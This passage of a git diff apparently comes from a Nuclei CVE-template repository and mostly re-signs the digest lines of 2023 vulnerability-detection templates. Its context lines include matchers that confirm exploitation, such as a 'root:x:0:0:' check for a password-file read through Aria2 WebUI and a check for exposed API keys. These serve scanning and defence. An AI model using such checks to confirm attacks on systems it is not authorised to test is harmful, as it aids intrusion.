a/http/cves/2023/CVE-2023-38964.yaml +++ b/http/cves/2023/CVE-2023-38964.yaml @@ -43,4 +43,4 @@ http: - 'contains(header, "text/html")' - 'contains_all(body, "", "All courses")' condition: and -# digest: 490a004630440220588a1a20171ed9e63186819de5ce752cf21132d717d03d74100877a2037385cf022007fb5a6ec93b218fd213ed4c152c786d03f8e6aae0ec8e2eaee9177460c173e0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100fc3ef9c3df26b3afecca702e9abd986af4773485c1261f369bb32e2c059bc1040221008fad9bec13f7b3bb22ed5cbddafb19b3d28df6f4bc7d80092da76e900d2525ec:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-39002.yaml b/http/cves/2023/CVE-2023-39002.yaml index a76c9f68a0..04a9e3c513 100644 --- a/http/cves/2023/CVE-2023-39002.yaml +++ b/http/cves/2023/CVE-2023-39002.yaml @@ -76,4 +76,4 @@ http: regex: - 'type="hidden" name="([a-zA-Z0-9]+)" value="([A-Z0-9a-z]+)" autocomplete="' internal: true -# digest: 4b0a00483046022100c9a7773d904e9fa5c973745a8ee5c0f73380b28f646d8f3ff079eafd3a063e7c022100f3fa44d5e64cf31c9b245337c65ffa6e69c59c68ba5b34ffc15408ed780def70:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220210b73cd75866a80ef8cf1ef7f0c230ccb8335664a46ca37d236501bb802760a0220455c59c9fdf00b97f3082c658c098ec010d464d80f683693b3d6f3f2b1cb8672:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-39026.yaml b/http/cves/2023/CVE-2023-39026.yaml index c1d2641c2a..87850f6e68 100644 --- a/http/cves/2023/CVE-2023-39026.yaml +++ b/http/cves/2023/CVE-2023-39026.yaml @@ -44,4 +44,4 @@ http: - "contains(content_type, 'text/plain')" - "status_code == 200" condition: and -# digest: 4b0a00483046022100c8237ade5adc55459f68743aca2aa30e8aa8de98fcffff36262985d1038add45022100f003f17b5f16a43845084bc29f3bc6bbcc86845bb32e5df35fe9c65002dd2bf6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221008eef2df71e4ec7a1c95eb0f6c0b02ea05a34fa520204cb86ff7caa631347ed10022100ad957b79ec1db60d79e81321296879187e38884b187b9647ab712761b6ed96fa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-39108.yaml b/http/cves/2023/CVE-2023-39108.yaml index 65816e9130..dfaa8f2b83 100644 --- a/http/cves/2023/CVE-2023-39108.yaml +++ b/http/cves/2023/CVE-2023-39108.yaml @@ -62,4 +62,4 @@ http: part: header_3 status: - 200 -# digest: 4b0a0048304602210090ac3eea92e5a41afb2bb6cc79b850803be8d90654e131d3155f74826abc4ae8022100ad646f643e976f8f859ef1aef542e1d37db72aa3fa2a840a964ad510f756f881:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100b707b4d3b5b7b3c72604ee68acc636ed7c5af48169fef985f1ce76826fab1c870221008de99fb0c60906d5ee1304e323d132dca9b12994a5c1e18a3da00b34603dc9d1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-39109.yaml b/http/cves/2023/CVE-2023-39109.yaml index 69d5a2008e..4695da7659 100644 --- a/http/cves/2023/CVE-2023-39109.yaml +++ b/http/cves/2023/CVE-2023-39109.yaml @@ -61,4 +61,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100d3246be44ceef6ea2e435be5a11aae0e8e6a5b0bff8ff778f8541446b1566252022100c08b1259680e594668aebd2ebdd3e2bc2a1937bc404b59c4bc2b4c3bbb0747c7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022036ef8b4f6f889c0ec877ae9a013ad526d94d3149fb8c517c97b9a2a0ba39054f02202c881f4ff35129806cf26c35d0a755001d55e1f6eddd502ee10e56dfcd596aa7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-39110.yaml b/http/cves/2023/CVE-2023-39110.yaml index 5161381a08..84919e4c5f 100644 --- a/http/cves/2023/CVE-2023-39110.yaml +++ b/http/cves/2023/CVE-2023-39110.yaml @@ -62,4 +62,4 @@ http: part: header_3 status: - 200 -# digest: 490a0046304402207f76db15bb398543e9501f63c4ad814bd902f8f8c51a8ee350506f79735e17ae02206fef9f11657871d39967978871c9fb85398198ed6f4078057df0ebbfdf85ea41:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b12af2cf2c76b4847a0c93cda3e5872ecab627071d48a9b4398f5d04ff87342802205f2a3ac8a4d3ce38ffc44a860ef7451a4cef8622976e221429d5478f0b794e2c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-39141.yaml b/http/cves/2023/CVE-2023-39141.yaml index 950b60a1cd..962ddcd133 100644 --- a/http/cves/2023/CVE-2023-39141.yaml +++ b/http/cves/2023/CVE-2023-39141.yaml @@ -46,4 +46,4 @@ http: - 'contains(body_1, "Aria2 WebUI")' - 'regex("root:x:0:0:",body_2)' condition: and -# digest: 4a0a0047304502210095b97a18980d901d900ac8182e8f6d76a5a2a67a7ee84484e85a9a171ec2970a02200bf1e08f9eb496e54ea1b42f07c0c06c2e2f7a83917c4b1b9a4d4ac9ca61b7ed:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502205642c88712c4ca0de0dc516a86a8b77ef72c1cd5a3a62d78bd3de9c30a461a1402210082ed3fac6d044d18c610af07f0b4979e18c4643720c27be2843249a7ee965742:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-39143.yaml b/http/cves/2023/CVE-2023-39143.yaml index 7c0df7cb84..67e334eca5 100644 --- a/http/cves/2023/CVE-2023-39143.yaml +++ b/http/cves/2023/CVE-2023-39143.yaml @@ -45,4 +45,4 @@ http: - contains(to_lower(content_type), "image/png") - contains(hex_encode(body), "89504e470d0a1a0a") # PNG file signature in hex condition: and -# digest: 4b0a00483046022100c6b50e3324b68352bd5bfe29633a9db388f1c831c218c8a4e23106a478bc6b7002210099ac0e1d64eae74b2664fccf7eff0e8c2cc9e5cd862c7b3e5abb81755c90e381:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022025fa7213cde7b40ca9e398ead9280e4297d285a3cad3948d79b396586c5ada500221008b224395ac8dfc494bb435b7b7c5102e2515eb19d27157d070df13c766c10e38:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-3936.yaml b/http/cves/2023/CVE-2023-3936.yaml index 5b82e3d346..c36cdd4d6e 100644 --- a/http/cves/2023/CVE-2023-3936.yaml +++ b/http/cves/2023/CVE-2023-3936.yaml @@ -56,4 +56,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100d2542c5b578aa1b6054c4391c618faf48d5a6721aa2a2c6f8f5282d057aaeb62022100f40e458db85ae7f25e9ceda5370d49473cb23b2dbd1db4b82625581ce539525a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402206a9cdd49e5fc62423b550121259ff1d80c849ab273f66ae6579dcfa7d245269d02206782a407244948dbae7962e67a7a5310a5503ad9a6f445a9f4d7813f0e3b3ea6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-39361.yaml b/http/cves/2023/CVE-2023-39361.yaml index 8cbd252f43..182469a15f 100644 --- a/http/cves/2023/CVE-2023-39361.yaml +++ b/http/cves/2023/CVE-2023-39361.yaml @@ -46,4 +46,4 @@ http: - 'status_code == 200' - 'contains_all(body, "Tree Mode", "cacti")' condition: and -# digest: 4b0a00483046022100c25eecdf587234017cf6b626efb9d75b33a6de8aa74f8c2fb47d7a9a88a1e6630221008ead6f563992b037d679640d1b38a8f29f1ba2082ec853cf4a27034c2a8595ef:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100dd81fab299fe2f6dfd7848f41bdedef38af20eca6216c03868f2459ab0e54287022100b67c2e415c35823e85ebfe762f7e828909e4eeb134360312d24ee5e68c5cd95d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-39598.yaml b/http/cves/2023/CVE-2023-39598.yaml index 33441386ac..93632ed6a7 100644 --- a/http/cves/2023/CVE-2023-39598.yaml +++ b/http/cves/2023/CVE-2023-39598.yaml @@ -52,4 +52,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022066fea1c991470ad12b0b6368cc977cb17842be9a515cfb209f347e80761a7fca02210099ca332958026e4c04ae258f60fead3e94e63aac0b964f658b9b0e0c795bce2b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220752d5fdf38bf0e6755332bfc4826a2b58985659f3351ecf5cdfe7cd736c5239d022100f71fb0de070712b29e120694ed800c06fc13a08f93ee7de72c7bc3beed77849a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-39600.yaml b/http/cves/2023/CVE-2023-39600.yaml index 7b736919f8..58f1e953e7 100644 --- a/http/cves/2023/CVE-2023-39600.yaml +++ b/http/cves/2023/CVE-2023-39600.yaml @@ -51,4 +51,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502200265cbcb6af05e61fad5c3086201ea2c320faf4a231352a2375f2f5b58537fd3022100bc56106b38fa09b709016bfe171871b601e72d08fdf0d3906c7d071c8fb2826a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221008d42e07ce0725cc3c29bc283508e66446d4e4ea04ad76ef351806af55652899a022100b20754cdd73731a8db161450ad7163b290c3e877d388e6d0892cb0f816dce251:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-39676.yaml b/http/cves/2023/CVE-2023-39676.yaml index 61a62b5d5a..4cb540787a 100644 --- a/http/cves/2023/CVE-2023-39676.yaml +++ b/http/cves/2023/CVE-2023-39676.yaml @@ -47,4 +47,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022045b80f7ecb911d219381e8f7789434632ff0c96af4db2c08ef74e4b32b7d9f0f022100f70379fd255ea20f6d6da9608fc81cf4423b55421650a9c5fc4dd3834df6845f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a0048304602210081fd832306abb4c2db24ccc4def607909798787bc61db7834428d4677baf10ea0221009f538af7773ea40facf783b248a551184e163f2c19291d156c36330425ca64ff:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-39677.yaml b/http/cves/2023/CVE-2023-39677.yaml index d972e97231..51b127efc6 100644 --- a/http/cves/2023/CVE-2023-39677.yaml +++ b/http/cves/2023/CVE-2023-39677.yaml @@ -54,4 +54,4 @@ http: group: 1 regex: - '>PHP Version <\/td>([0-9.]+)' -# digest: 4a0a004730450220433b7e31747bf747810caff412effad724e047b8f0cfdbf37de29f43da98fb3d022100f0a4df6bcc9fd476fe130c2cdf286da02199f192c93479f7d3acca35579d666c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502200f1a0c8bcefa038f928d8c3d428072dbf999a9204695c95506ed91ff90ee2c8d022100a91d93e2e994eb753b83e53e8c90515b98407dc3897a8f8984177dd56261da60:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-39700.yaml b/http/cves/2023/CVE-2023-39700.yaml index b00e4c04a2..1e99397e05 100644 --- a/http/cves/2023/CVE-2023-39700.yaml +++ b/http/cves/2023/CVE-2023-39700.yaml @@ -42,4 +42,4 @@ http: - 'contains(header, "text/html")' - 'contains(body, ">") && contains(body, "IceWarp")' condition: and -# digest: 4a0a0047304502203930c735d889ed16173497baf4f00e9422930afaef7984f350a34fa7a68289fb022100838b15182d9d030c464bc3252a19193f0ad318b5b23362ec78e0f5d8e58ad0f9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b2ae7ae440b4eec6e6da255baf7f80cc35c640f8e7e4de0a5d363d2a8767f387022071038577f46d450adbb855b9ec4df1a5badf08408433fffb0972b205e056be4e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-39796.yaml b/http/cves/2023/CVE-2023-39796.yaml index 7bdeafadf7..3187e5044b 100644 --- a/http/cves/2023/CVE-2023-39796.yaml +++ b/http/cves/2023/CVE-2023-39796.yaml @@ -42,4 +42,4 @@ http: - 'status_code_1 == 200' - 'contains(body, "Record deleted successfully!")' condition: and -# digest: 4b0a004830460221009cfde4a69aa6b2b5742a2830be00f5359ecd9be30f15f6522fb80e4ed32429ce022100d8cc11c0878452a27fb9ab372e2f67fbccd3e8b9ca30079ae62e533abede4b71:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100bc6387053a528f5da55af6a431c8e8a7256148c4be5ce8f6dc5db9b3b8974b1f022100c4d7d900752e413d2a79cff723d5e88bab601eade61c0ed12b050cf87dc10a85:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-40208.yaml b/http/cves/2023/CVE-2023-40208.yaml index 2a4ed4126a..a8bf286cc0 100644 --- a/http/cves/2023/CVE-2023-40208.yaml +++ b/http/cves/2023/CVE-2023-40208.yaml @@ -58,4 +58,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022042548140cbcebc9b51e355d4673028e53db18e5e157b176796ea8abb79e5dc7902205f298d4225c8d922ae3c4a9a5f23956880fed673540ded1004b53276128d20d0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220056d69daada66633276ae37f2d2c9c36013ba0f1d18e7e240f40fd6db47a15b1022100878f118a3ebe1a847cf47ff121b388b4fc0c454c9138b800f184f6d752c5b206:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-40355.yaml b/http/cves/2023/CVE-2023-40355.yaml index 4a57276e75..cd97e25471 100644 --- a/http/cves/2023/CVE-2023-40355.yaml +++ b/http/cves/2023/CVE-2023-40355.yaml @@ -49,4 +49,4 @@ http: - 'contains(response, "Axigen")' - 'status_code == 200' condition: and -# digest: 4a0a0047304502210089d5aa0ce825695bb9ea5e7f7d0ed99275c71b68c467bbc2b7a3f5731ea21a6b0220691c6922540b2937f29bd4712cd7da837b1c42e3305b9aeabc102b8b17c9005d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502201711e917883974fc1055e22022c081d81aefb637222322fc595cf91d992c05b8022100b25c9d8d083dc86f817080e290fe7dd21bbeec43c59b4fb98ba9724d52857b64:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-40779.yaml b/http/cves/2023/CVE-2023-40779.yaml index 3148a7c620..e4204363ec 100644 --- a/http/cves/2023/CVE-2023-40779.yaml +++ b/http/cves/2023/CVE-2023-40779.yaml @@ -43,4 +43,4 @@ http: - type: status status: - 302 -# digest: 4a0a0047304502205688139ac072aa9cc722af60b180b98debd637c0905e2151de237b1f47ef1fe5022100e935f1d54586ab3c5b62921b0477047bc653ee866a09fae50f38de108caec714:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f21a2b81ae7fd83b758582647b0492ff9a140bba7412af9fbd1a9acfc5e27583022100e2cfcb50142a1e7f75d7dbb067c13e075607a023ae2c018557176eba2df700da:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-4110.yaml b/http/cves/2023/CVE-2023-4110.yaml index e39b936fcd..362f05240d 100644 --- a/http/cves/2023/CVE-2023-4110.yaml +++ b/http/cves/2023/CVE-2023-4110.yaml @@ -38,4 +38,4 @@ http: - 'contains(content_type, "text/html")' - 'contains_all(body, "Booking", "Arrival", ">")' condition: and -# digest: 4a0a00473045022100dd5abe7b4ecc19617163506032de3f314ba51740ebceebacbe16cca232327bd1022068118d6d2da41b0d087107dd4c56af59e7c93d834106bd2a0e5d2e3e3c64ecfd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022011f3ef24c41dbb0af2002b9e94af8e13843e80882af1ad261dd9824d612d5996022100d4efe87afa3e996a33be585e48d069e66c01b0e75805473390a91fd7af811806:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-41109.yaml b/http/cves/2023/CVE-2023-41109.yaml index d7d3b8bbb0..355c1c497b 100644 --- a/http/cves/2023/CVE-2023-41109.yaml +++ b/http/cves/2023/CVE-2023-41109.yaml @@ -47,4 +47,4 @@ http: part: body words: - "dd556350275e2ee0a2e877cea9c8a74a" -# digest: 4a0a0047304502202bfc9da42e19e2e2ee3b4774db0a0deed67a87e5115c8868e175566429724498022100ef5913fc5f59bb9dbf437ebb76d6ec44d1e3fff82794bf190909f9e6acd3ec98:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100957697fedc1e8c0e72418b4a7ff9772edd859418f1b322713e3e6054d20c362d022100ecc7504e92125a1f7a4a4e533b58833d07d6e312f31036b0938734535c480fbe:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-4111.yaml b/http/cves/2023/CVE-2023-4111.yaml index 9787d55ceb..70da6f403e 100644 --- a/http/cves/2023/CVE-2023-4111.yaml +++ b/http/cves/2023/CVE-2023-4111.yaml @@ -38,4 +38,4 @@ http: - 'contains(content_type, "text/html")' - 'status_code == 200' condition: and -# digest: 4a0a00473045022100c72e388d83be779eae11d3636afc409495de936dfa859dff8ff69d9e4dd4a15802207594bec3402c8d72da7fc37222348df75178687c59732812c7b893921365a518:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100a952678ae86dae9a2000d260905d980dbf78991bd59b1171724367b6498ceeec022100f953232b2e97fbcd222f2a7a5883a0cefb7cb6f897e9402226c706967bcfded3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-4112.yaml b/http/cves/2023/CVE-2023-4112.yaml index e91ffffb5a..30dc5b1d7d 100644 --- a/http/cves/2023/CVE-2023-4112.yaml +++ b/http/cves/2023/CVE-2023-4112.yaml @@ -41,4 +41,4 @@ http: - 'contains(content_type, "text/html")' - 'status_code == 200' condition: and -# digest: 490a00463044022018c2cd802d511a3ec6b3a5e13a8ef5069df64208c7bd9f7ef8fe07e54510f4ef02206d9261b2d4c426dea6831bab220898c4613025136f1f8bed4cdba7e34beb8f88:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502205038e6120fa114f34508a9045dd6dc65f891cc5c9a393034fe1b0d8bfe8c848d022100ba9cb87c17ffbbc41a4ed0d2977869a86cdb4b30886fc3c032a36b12964856b6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-4113.yaml b/http/cves/2023/CVE-2023-4113.yaml index 01a01ffc9b..806c3959f8 100644 --- a/http/cves/2023/CVE-2023-4113.yaml +++ b/http/cves/2023/CVE-2023-4113.yaml @@ -38,4 +38,4 @@ http: - 'contains(content_type, "text/html")' - 'contains_all(body, "Select Service(s)", ">")' condition: and -# digest: 4b0a0048304602210081a78e8845024d25eab47ddc2ea3b7ce21b4868e8bcd8751b905575ab1a1cce2022100bc0e77f12b39336c4e7b2bfc219d37a5fa9ba58f44352aefca12decceb34a147:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100bf132073217cb77de7ed0548b509ed876572eeb7fecd5f659a6276eed21735f502210097ddeb29ce9316744ce029231b514e03212f2d972b0e296cbf64cb18cb3b4e50:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-4114.yaml b/http/cves/2023/CVE-2023-4114.yaml index 1ec0ae73d2..a10231e6fa 100644 --- a/http/cves/2023/CVE-2023-4114.yaml +++ b/http/cves/2023/CVE-2023-4114.yaml @@ -39,4 +39,4 @@ http: - 'contains(content_type, "text/html")' - 'contains_all(body, "Drinks & Extras", "Checkout", ">")' condition: and -# digest: 490a004630440220404eff835027749f25ade1644a56cf1698eb2c6a9ad6553068c61c6023e9bae40220384c63acecfb509a720f108a0c47a0f553107ff614841960525380056c907818:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a0048304602210080ac094c8bac706dec5b9aaff33fe5b1cf5d440c38e72ab153ae179d8609d7dc022100e03c8ef4d271818cf34d18719585e2c6413a277b292cf0309ff69978514a86b6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-4115.yaml b/http/cves/2023/CVE-2023-4115.yaml index 6451e653ef..8abad65a7b 100644 --- a/http/cves/2023/CVE-2023-4115.yaml +++ b/http/cves/2023/CVE-2023-4115.yaml @@ -39,4 +39,4 @@ http: - 'contains(content_type, "text/html")' - 'contains_all(body, "Enquiry summary", ">")' condition: and -# digest: 490a00463044022034beeb12d66272799e9718ec924c454b445020129f3be7e51f27cac48824a99902201586952e2c5671c95203f1e81868eae762c7450bc1aec0dea74dd5bccdd96ee1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402200a9ee27d504cde8dfc06a47e8d49fdf63ee33e9e6654e290898db2ae143bb3f20220160f64074ef588bae2217521f1d5912cab6373816198afa00a65ed10717aca8d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-4116.yaml b/http/cves/2023/CVE-2023-4116.yaml index babf0a3d96..aafc07dd22 100644 --- a/http/cves/2023/CVE-2023-4116.yaml +++ b/http/cves/2023/CVE-2023-4116.yaml @@ -41,4 +41,4 @@ http: - 'contains(content_type, "text/html")' - 'contains_all(body, "Passengers", "Drop-off address", ">")' condition: and -# digest: 490a00463044022014e56b9021d2442982b86a1d21892f238398d218d593b939cf613c4485737f8802205ae68c8fd53c1b5048efba29b99e73f220fdcdc2b85dbdfb6c4418e942d82d51:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100a418b709d2b7082873e897a36eafc1bbb1f3aa8709f7f2e4c49d412cef87d40e022100afe22952963f904e49afc245fd7b7ebce634024e4f0289a90de498a8574096d8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-41265.yaml b/http/cves/2023/CVE-2023-41265.yaml index 839f8dab6d..e4930430c5 100644 --- a/http/cves/2023/CVE-2023-41265.yaml +++ b/http/cves/2023/CVE-2023-41265.yaml @@ -50,4 +50,4 @@ http: - contains(to_lower(set_cookie), 'x-qlik-session') - contains(header, 'Bad Request') condition: and -# digest: 4b0a00483046022100df63da243752a7c8ae5b4419c6c0bc3d012438f3aad942de819106d8d7dcad6d022100869cb12653434026c70d72cf0b96cc8bded65bf24f15d64149a11ca8a0ad02f1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f301d69b556a95e9154963b4f371aba1261981f5a5201b53ae8f30f12833908402207c56e74c9c34d7c1a82534086eac52d23e022a6b59447e7f877a92e227d79efd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-41266.yaml b/http/cves/2023/CVE-2023-41266.yaml index 90898a1680..bfb288fc63 100644 --- a/http/cves/2023/CVE-2023-41266.yaml +++ b/http/cves/2023/CVE-2023-41266.yaml @@ -45,4 +45,4 @@ http: - contains(to_lower(set_cookie), 'x-qlik-session') - contains(body, 'The comparison expression does not consist of three elements') condition: and -# digest: 4a0a004730450220566ec421ad7c50d5c1ea0f5fc891bbfc4415f305269b368b4415cf400032ab73022100f632ad54d2e5af16208befc75b62c9847e5d9a1fc9fcf40f2f293b0f48e4e243:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220405aa3356f11e260c674c3e45a4333571ad339aac53cdc3eabe2736ecf752c8502207a342b810f3fcb5adf83a17f60888d57f6a458937e755ececc1fb862f3e8d713:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-4148.yaml b/http/cves/2023/CVE-2023-4148.yaml index 0ddb1394a8..647348cb75 100644 --- a/http/cves/2023/CVE-2023-4148.yaml +++ b/http/cves/2023/CVE-2023-4148.yaml @@ -48,4 +48,4 @@ http: - 'contains(body_2, "") && contains(body_2, "ditty")' - 'contains(content_type_2, "text/html")' condition: and -# digest: 4a0a0047304502200c8125e1b2756d93127dccae80839b4c8c96616d63a000b81bf2b9f2032630910221008845ebdd0ea5cac9c9e9384d760e14af1ad449f31e8be0386857c03cc18433dd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100c515dc77b4cc4aa9f91298fc8d13c42df8117c4f8d63c6e62d3002ca0576a6e80221009dcdddaf6f1074a6cc16ea30e388f2677769dd9d6b38cc02694849c16a146974:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-41538.yaml b/http/cves/2023/CVE-2023-41538.yaml index 1c0bbed02a..15f2253e2c 100644 --- a/http/cves/2023/CVE-2023-41538.yaml +++ b/http/cves/2023/CVE-2023-41538.yaml @@ -39,4 +39,4 @@ http: - 'contains(content_type, "text/html")' - 'contains_all(body, "New Question", ">")' condition: and -# digest: 4a0a004730450220573b221f96c005a1ce69b11406267e60cf2fbe090ed4f46ff8e7bb16998e44aa022100fa56d9f414f55ccace60412ec5cac4c7ddf27c165a80761b51be1ead05e38e94:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022002b9e872ab843ef7e6c81bd5a514ceeabce0a6488e8033a2e883c53539c8cddf02205c03b386c06890d214ae90d4f79d189025d15d7ffa668ad74119ff5d23491d0b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-41642.yaml b/http/cves/2023/CVE-2023-41642.yaml index bfab310376..f786b71686 100644 --- a/http/cves/2023/CVE-2023-41642.yaml +++ b/http/cves/2023/CVE-2023-41642.yaml @@ -53,4 +53,4 @@ http: part: header_2 words: - text/html -# digest: 490a0046304402201643b88d733d26e6806782978b52461d265bd0abf68328a30b05fe8912612357022038b9d82a8da8c11ea5f55e5723d733d3456e6ca29780cab4460c3e48805fd639:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402200655a96e735e87963a7690ba044aa123f88b06fa70877f5c00d977959a5c094002200a7012dcc63dac74f65fb63e04cf69e68a5c0c1c5f6bd6d179f64140d1d90f31:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-4168.yaml b/http/cves/2023/CVE-2023-4168.yaml index 35ee14c414..be08a55d80 100644 --- a/http/cves/2023/CVE-2023-4168.yaml +++ b/http/cves/2023/CVE-2023-4168.yaml @@ -39,4 +39,4 @@ http: - 'contains(content_type, "text/html")' - 'contains_all(body, "google_map_key", "api_key", "auth_domain")' condition: and -# digest: 4b0a00483046022100a28b3fde66ec316e5d35e1bf44412d58add66c90225ea0a9fa425fc2828d6f47022100907ceb1d8aa34797e99ee9cc6bc997a324aecc9e2dfd80ee8824de4f81b07ffd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502204a134453e2464f93bf132fd8db6c09f27613be39ba4c0aaef68337bd060407ff0221009c766e234ab5de0d38872d51aaf73fb6396249477d8cfef7840159bba28559dd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-4169.yaml b/http/cves/2023/CVE-2023-4169.yaml index 84fe4bb11e..b748dfe238 100644 --- a/http/cves/2023/CVE-2023-4169.yaml +++ b/http/cves/2023/CVE-2023-4169.yaml @@ -56,4 +56,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402205bfba5a589782be2d0036f90503b330fe659ef02b9af5ab8b2f27c84808f9788022074a92f73d65317b9a41a584965fdb4453c17e7ac9d0ae54eb460d3ceff37c0ff:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220368b98f36f09a638be30332a8c9e763dc3dc9c8ecf4fdb4d48262bfb0ee79d58022100dccc7a915cb6d0eb0970460c74652810244da8e1ffeaca8ef9f4cd1871990bbe:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-4173.yaml b/http/cves/2023/CVE-2023-4173.yaml index 2221179ef9..e00b6dbf25 100644 --- a/http/cves/2023/CVE-2023-4173.yaml +++ b/http/cves/2023/CVE-2023-4173.yaml @@ -55,4 +55,4 @@ http: - type: status status: - 404 -# digest: 4b0a00483046022100aabc5f4a70666c4149f432645c3b9306de4ad4d670a3c80bbd3419cdeaeecc17022100ed6b3b25edee45a8c93e2996d53d2cda7209d5cee5c38864ca5ec841b526cda6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022000a0cc69486d6d9cbda953429f12b560b53462ee713d9e032f548c492903087c022046613a2e9d8e8ce1405dcf3366c8f551d340a96f7c337ed0c3495273864b492e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-4174.yaml b/http/cves/2023/CVE-2023-4174.yaml index 5a7b1fe0c4..45a9412938 100644 --- a/http/cves/2023/CVE-2023-4174.yaml +++ b/http/cves/2023/CVE-2023-4174.yaml @@ -57,4 +57,4 @@ http: part: header words: - "text/html" -# digest: 